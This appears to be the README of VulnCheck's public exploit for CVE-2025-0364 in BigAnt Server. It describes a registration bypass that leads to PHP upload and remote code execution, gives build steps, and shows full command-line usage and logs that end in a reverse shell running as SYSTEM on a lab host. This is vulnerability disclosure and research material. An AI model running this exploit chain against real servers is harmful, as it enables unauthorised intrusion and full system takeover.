# CVE-2025-0364: BigAntSoft BigAnt Server Account Registration Bypass to File Upload RCE

The BigAntSoft BigAnt Server, which provides a Windows hosted on-premises chat server that focuses on business use cases, is vulnerable to unauthenticated remote code execution via account registration and PHP file uploads. The vulnerability takes advantage of a default exposed SaaS registration that allowing an attacker to solve a simple CAPTCHA and then create an administrative user that can upload to the Cloud Storage Add-in. The system allows for the upload of PHP files that can trigger without authentication, leading to a exploit chain of no-authentication to remote code execution in all current, 5.6.06, and below versions.

The VulnCheck team identified this vulnerability during the triage of [CVE-2024-54761](https://github.com/nscan9/CVE-2024-54761-BigAnt-Office-Messenger-5.6.06-RCE-via-SQL-Injection), which turned out to require administrator access and had an incorrect CVSS Privileges Required (PR) value. The VulnCheck team identified a few quick indicators of insecure programming practices and chose to investigate deeper, leading to the discovery of this authentication bypass and file upload remote code execution. At the time of discovery there were roughly 50 BigAnt servers on the internet and at the time of publishing this blog there were around 30 identifiable instances.

See our blog for all the technical details and writeup: https://vulncheck.com/blog/bigant-cve-2025-0364

## Building

If you have a Go build environment handy with `golangci-lint` and GNU `make`, you can use `make`:

```
$ make
gofmt -d -w cve-2025-0364.go
golangci-lint run --fix --timeout 3m cve-2025-0364.go
GOOS=linux GOARCH=amd64 go build  -o build/cve-2025-0364_linux-amd64 cve-2025-0364.go
```

To build the exploit into a docker image simply:

```
make docker
```

## Example Exploitation

Exploitation will take 2 executions in order to solve the CAPTCHA and then feed the required data back to the exploit with the solved CAPTCHA:

### CAPTCHA Retrieval 

```console
poptart@grimm $ ./build/cve-2025-0364_linux-amd64 -rhost 10.0.0.104 -rport 8000 -lhost 10.0.1.10 -lport 1337 -v -c -e
time=2025-01-09T14:49:56.185-07:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2025-01-09T14:49:56.227-07:00 level=STATUS msg="Starting TLS listener on 10.0.1.10:1337"
time=2025-01-09T14:49:56.227-07:00 level=STATUS msg="Starting target" index=0 host=10.0.0.104 port=8000 ssl=false "ssl auto"=false
time=2025-01-09T14:49:56.227-07:00 level=STATUS msg="Validating Bigantsoft Bigant Server target" host=10.0.0.104 port=8000
time=2025-01-09T14:49:56.272-07:00 level=SUCCESS msg="Target verification succeeded!" host=10.0.0.104 port=8000 verified=true
time=2025-01-09T14:49:56.272-07:00 level=STATUS msg="Running a version check on the remote target" host=10.0.0.104 port=8000
time=2025-01-09T14:49:56.301-07:00 level=VERSION msg="The reported version is 5.6.06" host=10.0.0.104 port=8000 version=5.6.06
time=2025-01-09T14:49:56.301-07:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.0.0.104 port=8000 vulnerable=yes
time=2025-01-09T14:49:56.301-07:00 level=STATUS msg="CAPTCHA flags not set, retrieving captcha-hash"
time=2025-01-09T14:49:56.317-07:00 level=STATUS msg="Open the following page in a browser and solve the CAPTCHA: http://10.0.0.104:8000/index.php/Home/Public/verify"
time=2025-01-09T14:49:56.317-07:00 level=STATUS msg="Solve CAPTCHA and pass the following flags to this exploit: `-captcha-hash 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 -captcha-session 4fbsn0i6bdiuu6vuik99gbhndb -captcha <SOLVED CAPTCHA>`"
^C
```

### Solved CAPTCHA to SaaS Account Registration and PHP Upload RCE

```console
poptart@grimm $ ./build/cve-2025-0364_linux-amd64 -rhost 10.0.0.104 -rport 8000 -lhost 10.0.1.10 -lport 1337 -v -c -e -captcha-hash 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 -captcha-session 4fbsn0i6bdiuu6vuik99gbhndb -captcha VKZ6
time=2025-01-09T14:50:18.502-07:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2025-01-09T14:50:18.575-07:00 level=STATUS msg="Starting TLS listener on 10.0.1.10:1337"
time=2025-01-09T14:50:18.575-07:00 level=STATUS msg="Starting target" index=0 host=10.0.0.104 port=8000 ssl=false "ssl auto"=false
time=2025-01-09T14:50:18.575-07:00 level=STATUS msg="Validating Bigantsoft Bigant Server target" host=10.0.0.104 port=8000
time=2025-01-09T14:50:18.620-07:00 level=SUCCESS msg="Target verification succeeded!" host=10.0.0.104 port=8000 verified=true
time=2025-01-09T14:50:18.620-07:00 level=STATUS msg="Running a version check on the remote target" host=10.0.0.104 port=8000
time=2025-01-09T14:50:18.650-07:00 level=VERSION msg="The reported version is 5.6.06" host=10.0.0.104 port=8000 version=5.6.06
time=2025-01-09T14:50:18.650-07:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.0.0.104 port=8000 vulnerable=yes
time=2025-01-09T14:50:18.650-07:00 level=STATUS msg="Password that will be used for authentication: kyLZiAddnH"
time=2025-01-09T14:50:18.650-07:00 level=STATUS msg="Registering SaaS org: LBJCUE (mpzo@fldlmarv.com) with password: kyLZiAddnH"
time=2025-01-09T14:50:18.675-07:00 level=STATUS msg="Getting new PHP session and pinning the SaaS org to the session"
time=2025-01-09T14:50:18.747-07:00 level=STATUS msg="Retrieving org SSID from demo page with session v1cir7mh9v4dfv4ik54mhq6so0"
time=2025-01-09T14:50:18.764-07:00 level=STATUS msg="Retrieved SSID for LBJCUE: 387360F0-EECD-622B-5B90-C37F2BBD45B3"
time=2025-01-09T14:50:18.765-07:00 level=STATUS msg="Activating SaaS organization"
time=2025-01-09T14:50:22.627-07:00 level=STATUS msg="Authenticating to the addin SaaS admin"
time=2025-01-09T14:50:22.673-07:00 level=STATUS msg="Visiting SaaS addin cloud drive page"
time=2025-01-09T14:50:22.762-07:00 level=STATUS msg="Got cloud drive root path UUID: 99C8911A-DCB3-E5F2-4298-1E3567AA0DAD"
time=2025-01-09T14:50:22.762-07:00 level=STATUS msg="Attempting to upload `JQsaYCKEOu.php` to cloud drive addin"
time=2025-01-09T14:50:22.819-07:00 level=STATUS msg="Attempting to trigger final payload, timeout is expected after callback"
time=2025-01-09T14:50:22.819-07:00 level=STATUS msg="Requesting final payload at: http://10.0.0.104:8000/data/387360F0-EECD-622B-5B90-C37F2BBD45B3/pan/99C8911A-DCB3-E5F2-4298-1E3567AA0DAD/2025-01-09/JQsaYCKEOu.php"
time=2025-01-09T14:50:22.821-07:00 level=SUCCESS msg="Caught new shell from 10.0.0.104:51690"
time=2025-01-09T14:50:22.821-07:00 level=STATUS msg="Active shell from 10.0.0.104:51690"
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\BigAntSoft\IM Console\im_webserver\htdocs\data\387360F0-EECD-622B-5B90-C37F2BBD45B3\pan\99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\2025-01-09>whoami
whoami
nt authority\system

C:\Program Files (x86)\BigAntSoft\IM Console\im_webserver\htdocs\data\387360F0-EECD-622B-5B90-C37F2BBD45B3\pan\99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\2025-01-09>^C
```
